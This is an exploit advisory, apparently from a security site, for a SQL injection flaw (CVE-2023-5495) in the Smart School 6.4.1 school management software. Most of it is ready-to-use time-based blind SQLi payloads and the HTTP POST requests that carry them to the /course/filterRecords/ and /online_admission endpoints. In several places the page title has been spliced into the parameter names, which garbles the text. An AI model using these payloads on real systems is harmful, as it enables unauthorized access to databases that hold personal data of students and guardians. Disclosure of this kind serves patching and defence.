Smart School 6.4.1 SQL Injection – Torchsec
# Exploit Author: CraCkEr
# Date: 28/09/2023
# Vendor: QDocs - qdocs.net
# Vendor Homepage: https://smart-school.in/
# Software Link: https://demo.smart-school.in/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-5495
# CWE: CWE-89 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /course/filterRecords/
POST Parameter 'searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]
-------------------------------------------
POST /course/filterRecords/ HTTP/1.1
searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3
-------------------------------------------
searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1]Smart School 6.4.1 SQL Injection - Torchsec=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
Path: /course/filterRecords/
POST Parameter 'searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
POST Parameter 'searchdata[1]Smart School 6.4.1 SQL Injection - Torchsec' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi
---
Parameter: searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1]Smart School 6.4.1 SQL Injection - Torchsec=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[0][searchfield] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1]Smart School 6.4.1 SQL Injection - Torchsec=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[0][searchvalue] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1]Smart School 6.4.1 SQL Injection - Torchsec=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[1]Smart School 6.4.1 SQL Injection - Torchsec (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1]Smart School 6.4.1 SQL Injection - Torchsec=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[1][searchvalue] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1]Smart School 6.4.1 SQL Injection - Torchsec=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z
---
-------------------------------------------
POST /course/filterRecords/ HTTP/1.1
searchdata[0]Smart School 6.4.1 SQL Injection - Torchsec=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1]Smart School 6.4.1 SQL Injection - Torchsec=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
-------------------------------------------
Path: /online_admission
---
Parameter: MULTIPART email ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--
---
POST Parameter 'email' is vulnerable to SQLi
POST /online_admission HTTP/1.1
-----------------------------320375734131102816923531485385
Content-Disposition: form-data; name="email"
*[SQLi]
-----------------------------320375734131102816923531485385
[-] Done
Gloss